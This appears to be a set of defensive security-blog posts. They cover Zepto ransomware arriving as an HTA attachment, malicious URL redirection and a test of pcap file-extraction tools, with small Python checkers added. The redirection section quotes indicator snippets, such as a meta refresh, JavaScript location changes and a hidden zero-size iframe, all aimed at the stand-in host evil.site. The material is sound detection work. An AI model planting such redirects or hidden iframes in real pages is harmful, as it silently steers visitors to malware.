Zepto Ransomware, The New Kid in Town

HTA Downloader delivers Zepto Ransomware

Attack Vector: Email Attachment
Malicious File: it5Ax.hta

The Zepto sample we found this morning arrived as a zipped email attachment containing an HTML Application (.hta) file. HTA files combine HTML with one or more scripting languages such as VBScript or JScript. A quick look at the file below shows it is HTML combined with obfuscated JScript. One of the significant dangers of HTA files is that once the file is downloaded and run, it is treated as a “fully trusted application”, whereas a regular HTML file is confined to the security model of the web browser when it runs.

We’ve seen Zepto and its cousin Locky arrive in DOCM attachments in recent months, and I am not surprised to see the evolution to HTA files. DOCM, which stands for Document with Macros, is a Word document with embedded scripts written in VBA (Visual Basic for Applications). Macros, however, don’t run by themselves and require user assistance. Whether the file is an HTA or a DOCM, the result is the same: once run, it downloads the malware from its C2 and executes it.

HTA Encoded JScript Downloader

Exploit and Post Infection Traffic

Post compromise, your files will be encrypted and their extensions changed to .zepto, similar to Locky, which changes file extensions to .locky.

Post Compromise the file extensions changed to .zepto

How-to-pay instructions appear on the user’s desktop and in every directory, explaining your predicament.

Desktop Image displays Instructions

Your personal identification ID in the help message is the same as the first half of each scrambled filename.

Locky and Zepto ransomware are similar in several regards: both are distributed primarily in massive spam campaigns via zipped JScript attachments, and both leave behind the same types of files, including a similar ransom note.

We expect to see more malware payloads sent as HTA documents so take a few precautions such as:

  • Change settings in Control Panel to show file extensions, to protect against misleading file names.
  • Configure Office settings to not allow macros in documents to run from the internet.
  • Always open .JS files in Notepad.
  • Backup your files regularly.
  • Treat all attachments as suspect.
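As an added example (not code from the original post), the precautions above can be applied mechanically before an attachment ever reaches a user: the Python check below opens a zipped attachment and flags members that are the executable types discussed here (.hta, .js, .docm and similar) or that hide behind a double extension. The extension list is an assumed policy and the zip contents are constructed for the demo.

```python
import io
import zipfile

# Attachment types that execute when double-clicked (assumed policy list,
# covering the HTA and JScript droppers and macro documents discussed above).
RISKY_EXTENSIONS = {".hta", ".js", ".jse", ".vbs", ".wsf", ".docm"}


def risky_members(zip_bytes):
    """Return (member name, reason) for each zip member that is a risky type
    or disguises itself with a double extension such as invoice.pdf.js."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            # Look only at the file name, not any directory prefix
            parts = name.lower().rsplit("/", 1)[-1].split(".")
            ext = "." + parts[-1] if len(parts) > 1 else ""
            if ext in RISKY_EXTENSIONS:
                reason = "executable attachment type " + ext
                if len(parts) > 2:
                    reason += " hidden behind double extension"
                findings.append((name, reason))
    return findings


def build_sample_zip():
    """Constructed sample resembling the zipped attachment described above
    (placeholder contents only, not real malware)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("it5Ax.hta", "<html><script language='JScript'>"
                                 "WScript.Echo('constructed placeholder')</script></html>")
        zf.writestr("Invoice.pdf.js", "// constructed placeholder")
        zf.writestr("readme.txt", "benign text")
    return buf.getvalue()


if __name__ == "__main__":
    for member, reason in risky_members(build_sample_zip()):
        print("SUSPECT:", member, "-", reason)
```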

URL Redirection, the good and the bad

URL redirection, also called URL forwarding, is not always malicious and has valid, acceptable uses. The technique allows a server to redirect a client request to a different page, site or domain for legitimate reasons. In a redirect, a web browser attempts to open a URL and that request is forwarded on to another location. Some of the legitimate reasons for URL redirection include:

Device targeting
A very common example of this is redirecting users to a mobile version of a website. If a user browses a site with a mobile client they could automatically be forwarded to a corresponding mobile version of a website.

Geo targeting
Typically seen on sites targeting large audiences in more than one location; it redirects users to more relevant, localized content.

Removing referer details
When a link is clicked the browser sends the Referer header, which could contain sensitive URLs that end up in the server logs of an external site. For example, http://packetreport.com/future-plans would not be a desirable Referer value to leave an organization; a redirection page removes that exposure.

Similar domain names
Users might type in a misspelled domain such as packtereport.com and get redirected to our actual site packetreport.com. This safeguards both the audience as well as the organization.

Redirection Used in Exploits
As security analysts we see this every day of the week: a user suddenly sets off an IDS alert for touching a known malware site or bad domain. I am always curious to see why this happened, and in most cases the user did one of three things: clicked a link in a phish, opened a document from a phish, or browsed a compromised site that has a malicious redirect configured. The following examples are not a complete list of techniques, but they are the most common malicious redirects.

HTTP Redirects
The HTTP 3xx Redirection status codes indicate that the client must take additional action to complete the request. Many of these status codes are used in URL redirection; the three most common are 301 Moved Permanently, 302 Found and 307 Temporary Redirect.

301 Moved Permanently: Known as a permanent redirect, this indicates that the originating URL has permanently moved to a new location.

302 Found: Indicates the target resource resides temporarily under a different URI.

307 Temporary Redirect: The target resource resides temporarily under a different URI, and the user agent must not change the request method if it performs an automatic redirection to that URI.

HTML Redirects
This is a client-side redirection that tells the browser to request another page.

To create an HTML redirect page, you use the HTML meta tag with the ‘http-equiv’ and ‘content’ attributes. Meta Refresh is a special meta tag placed in the head section of the HTML source. It refreshes the page to the new site listed after the url field. The number at the start of the content attribute is the delay in seconds before loading; if set to 0 the redirect happens immediately as the page is loading.

What to look for:

  • <meta http-equiv="Refresh" content="0; url=http://www.evil.site/" />

Javascript Redirects
A common method of redirecting users via JavaScript runs without any user input: the redirect script simply sets the browser’s location, using the same code a page would use to load another page.

What to look for:

  • "text/javascript">window.location='http://evil.site'
  • "text/javascript">window.location.reload("http://evil.site")
  • "text/javascript">window.location.replace("http://evil.site")
  • "text/javascript">document.location.href ='http://evil.site'

iframe/Frameset Redirects
This is a method where the content of another page is shown within an iframe or frameset, so that it looks like the content is part of the original URL. Especially dangerous are hidden iframes with width and/or height values of 0 or a few pixels, which are hardly visible to the user.

What to look for:

  • <iframe src="hxxp://evil.site/count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
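As an added example, not code from the original post, here is a small Python scanner that flags the three client-side indicators listed above (meta refresh, JavaScript location changes and hidden iframes) in a page's HTML, in document order. The sample page is constructed, and the "few pixels" threshold of 3 is an assumption.

```python
import re
from html.parser import HTMLParser

# JavaScript location assignments/calls that navigate without user input
JS_REDIRECT = re.compile(
    r"(window|document)\.location(\.href)?\s*=|"
    r"(window|document)\.location\.(replace|reload|assign)\s*\(")


def tiny(value):
    """True for an iframe width/height of 0 or a few pixels (assumed <= 3)."""
    digits = value.strip().rstrip("px")
    return digits.isdigit() and int(digits) <= 3


class RedirectScanner(HTMLParser):
    # Collects (kind, detail) findings for meta refresh, JS redirects, hidden iframes
    def __init__(self):
        super().__init__()
        self.findings, self.in_script = [], False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append(("meta-refresh", a.get("content", "")))
        elif tag == "iframe" and (tiny(a.get("width", "")) or
                                  tiny(a.get("height", "")) or
                                  "hidden" in a.get("style", "")):
            self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "script":
            self.in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):  # script bodies arrive here as raw text
        if self.in_script:
            for m in JS_REDIRECT.finditer(data):
                self.findings.append(("js-redirect", m.group(0).strip()))


def scan_html(html):
    parser = RedirectScanner()
    parser.feed(html)
    return parser.findings

# Constructed sample page combining all three indicators (not real malware)
SAMPLE = """<html><head>
<meta http-equiv="Refresh" content="0; url=http://www.evil.site/" />
<script type="text/javascript">window.location.replace("http://evil.site")</script>
</head><body>
<iframe src="hxxp://evil.site/count.php?o=1" width=0 height=0 style="hidden"></iframe>
</body></html>"""
```

Running `scan_html(SAMPLE)` returns one finding per indicator; a page with none of these patterns returns an empty list.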


The methods explained above are not new, revolutionary, hard to detect or very sneaky, but they work and malware authors will continue to use them. Redirecting users to malicious content using HTTP redirects or embedded iframes is not going to trend downwards or cease to be an easy way to deliver malicious content anytime soon. Detecting the redirect using IDS signatures or blacklists and blocking the subsequent chain is always key.



Python Script

A simple script that follows HTTP redirections and displays the resulting HTTP status codes for each hop.

—————–   http-redirect.py     ——————-
import requests

# requests follows 3xx redirects by default; each intermediate response is
# kept in r.history, and r itself is the final response
r = requests.get('http://evil.site')
for h in r.history:
    print('[%s] %s' % (h.status_code, h.url))
print('[%s] %s' % (r.status_code, r.url))



Network Packet Capture File Extraction Analysis

There are many tools available to security analysts for exporting files from network packet captures, commonly called pcap files. In many companies today, these pcap files are the only evidence security analysts have of the files that transit their networks. Exporting the complete file and maintaining file integrity is paramount in any cyber investigation. I have known for a long time that some tools are better than others for this purpose, but only recently, during an investigation where I exported a file from the same pcap using two separate tools, did I end up with two different MD5 hashes for the same file. Hence the reason for the analysis in today’s post.

We chose four popular tools for this test that are known industry-wide and commonly found in many security analysts’ toolkits. Three of the tools are open source (Wireshark, Bro and Chaosreader) and we are also testing the professional version of NetworkMiner. For consistency’s sake we are using a packet capture from our friends at malware-traffic-analysis.net which contains a nasty Flash exploit file.

Packet Capture

We downloaded 2016-04-13-pseudo-Darkleech-Angler-EK-after-medical-library.net-first-run.pcap from the malware-traffic-analysis April 2016 archive.


Wireshark (https://www.wireshark.org/)

Wireshark is the world’s foremost network protocol analyzer, used to examine packet capture files and capture network traffic.

After importing the pcap we downloaded, we can see in TCP stream 3 that a Flash file was requested via an HTTP GET and ultimately downloaded in an HTTP 200 response, with a file signature starting with CWS.

There are a couple of methods to export a file in Wireshark, but I will use the menu bar in this test.

In the menu, select File > Export Objects > HTTP. This packet capture contains two Flash files; we are going to test the 66 kB Flash file.

Select the file with content type application/x-shockwave-flash and choose Save As to save it to disk.

Verify the md5 hash

Wireshark MD5 – 246690cd9b09f84456ddab98261510bd

Bro (https://www.bro.org/bro-exchange-2013/exercises/faf.html)

Bro Network Security Monitor (Bro) is a powerful network analysis framework that is commonly used for intrusion detection and analyzing packet capture files. Bro’s analysis engine makes it adept at high-performance network monitoring, protocol analysis, and real-time application-layer state tracking. In our analysis we will leverage the extract-all.bro script available on the bro.org site (see the URL above).

Run the following command to export all files contained in the packet capture. The files will be exported into a directory, export_files.

The script drops all the files in a folder called extract_files; our file was renamed HTTP-FMBqgK2b8aa54wu7mc.

Verify the md5 hash

Bro MD5 – 246690cd9b09f84456ddab98261510bd

Chaosreader (http://www.brendangregg.com/chaosreader.html)

Chaosreader is an open source tool designed to aid in tracing TCP/UDP network sessions and extracting files; it produces detailed HTML output displaying the connection information found in packet captures.

The file is renamed session_0004.part_01.data; however, a view of the file properties confirms it’s our file.


Chaosreader MD5 – fc193d580ba0e80e20707baeb7f71f20

NetworkMiner (http://www.netresec.com/?page=NetworkMiner)

One of the great features of NetworkMiner is host identification and file extraction. To get started we imported our pcap into the professional version of NetworkMiner.

Select File > Import; the Files tab then presents all files contained in the packet capture.

Right-click the Flash file listed as x-shockwave-flash and choose Open folder.

Copy the file to disk.


Verify the md5 hash

Upload the file to VirusTotal to confirm the MD5 hash and community analysis

Note the MD5 hash matches the two previous tests, and the community AV results confirm it’s a known Flash exploit.


NetworkMiner MD5 – 246690cd9b09f84456ddab98261510bd


Of the four tools we analyzed, three exported the complete file intact according to the MD5 hash. The tool that didn’t export the complete file in this test was Chaosreader. The lesson here is that there are numerous tools security analysts use to resurrect files from pcaps, but some tools perform better or more consistently than others, so buyer beware. Our analysis was admittedly simplistic: we didn’t test large files or files transmitted over other protocols such as SSH, SMB or FTP, which we believe will also produce differing results between tools; we will save that for a future article.
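The comparison above boils down to one check per tool: does the exported file still carry the expected signature, size and MD5? Here it is as an added Python example (not code from the post or from any of the four tools); the "exported" files are constructed in a temporary directory, one intact and one truncated, and the file names are chosen to echo the ones above.

```python
import hashlib
import os
import tempfile

# A Flash (SWF) file starts with one of these signatures; the post notes the
# extracted sample begins with CWS (zlib-compressed SWF).
SWF_MAGICS = (b"CWS", b"FWS", b"ZWS")


def md5_of(path):
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def check_extraction(path, expected_md5, expected_size=None):
    """Compare one tool's exported file against a reference MD5 (and size)
    and confirm the SWF signature survived; returns a dict to diff per tool."""
    with open(path, "rb") as f:
        head = f.read(3)
    result = {"md5": md5_of(path), "size": os.path.getsize(path),
              "swf_signature": head in SWF_MAGICS}
    result["md5_match"] = result["md5"] == expected_md5.lower()
    if expected_size is not None:
        result["size_match"] = result["size"] == expected_size
    return result


def demo():
    """Constructed sample: a fake CWS payload 'exported' twice, once intact and
    once truncated, mimicking the kind of mismatch seen with Chaosreader."""
    payload = b"CWS" + bytes(range(256)) * 4
    reference = hashlib.md5(payload).hexdigest()
    with tempfile.TemporaryDirectory() as d:
        intact = os.path.join(d, "HTTP-intact.swf")
        truncated = os.path.join(d, "session_0004.part_01.data")
        with open(intact, "wb") as f:
            f.write(payload)
        with open(truncated, "wb") as f:
            f.write(payload[:-100])
        return (check_extraction(intact, reference, len(payload)),
                check_extraction(truncated, reference, len(payload)))


if __name__ == "__main__":
    for r in demo():
        print(r)
```

A truncated export keeps the CWS signature and looks like the right file in a viewer, which is exactly why the hash and size comparison across tools is the check that matters.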